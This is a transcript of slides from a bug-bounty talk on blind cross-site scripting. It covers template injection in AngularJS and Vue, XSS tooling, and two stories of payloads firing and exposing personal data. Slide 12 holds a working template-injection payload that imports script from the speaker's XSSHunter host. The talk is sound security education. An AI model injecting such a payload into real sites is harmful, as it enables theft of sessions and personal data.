Getting Blindly Lucky

Transcript

1. Getting Blindly Lucky Interesting Blind XSS Stories

2. {{ whoami }} Jasmin Landry JR0ch17 Part time bug bounty

   hunter

3. {{ agenda }} • What is XSS? • & •

   Blind XSS Stories • Questions/Comments

4. {{ XSS }} Cross-Site Scripting (XSS) attacks are a type

   of injection, in which malicious scripts are injected into trusted websites.* • Malicious Script • Types of XSS • Reflected • DOM => postMessage() • Stored => Blind * https://owasp.org/www-community/attacks/xss/

5. {{ XSS PoCs}} • Typical PoCs • Steal CSRF Tokens

   • Steal Cookies (if not HttpOnly) • Steal localStorage and sessionStorage tokens • Can also be used in CORS misconfigs with XHR or with the Fetch API to steal sensitive data (ie. PII) • SSRF if found in HTML to PDF converter

6. {{ }} MVC client-side framework built by Google • XSS

   • Not the typical XSS • Template Injection • {{7*7}} => returns 49 https://jsfiddle.net/navb4jh3/

7. {{ }} “Progressive” MVVM client-side framework for building UIs and

   SPAs • XSS • Not the typical XSS • Template Injection • {{7*7}} => returns 49 https://jsfiddle.net/s6b3dy25/

8. {{ vs }} https://www.wappalyzer.com/compare/angular-vs-vue-js/

9. {{ Blind XSS }} Variant of a Stored XSS. The

   payload is saved and executed in a separate part of the application (ie. Admin panel) or in a completely different application (internal application) • Tools • XSSHunter • Sleepy Puppy • Burp Collaborator

10. {{ XSSHunter Payloads }}

11. {{ HackerOne Hacktivity Blind XSS Reports }} All blind XSS

    payloads from HackerOne’s Hacktivity are from an HTML context (ie. <script> tag) Not a single one from template injection

12. {{ & Blind XSS Payload }} {{ constructor.constructor('import("https://jr0ch17.xss.ht")') () }}

13. {{ Blind XSS Stories }}

14. {{ Blind XSS Story #1 }} A Google search lead

    to Apple’s QuickLook feature QuickLook is a way to preview a file to view its contents instead of having to open the file

15. {{ Blind XSS Story #1 }} When an XSS triggers

    with XSSHunter, it captures the DOM...

16. {{ Blind XSS Story #1 }}

17. {{ Blind XSS Story #1 }} Turns out the CSV

    file contained a LOT of PII...

18. {{ Blind XSS Story #2 }} Again, I look at

    the DOM.....

19. {{ Blind XSS Story #2 }} Someone had filed a

    complaint on my user!!! The complaint was forwarded as an email The XSS triggered in the email system!

20. {{ Thank You}} Questions or comments @JR0ch17 https://linkedin.com/in/jasminlandry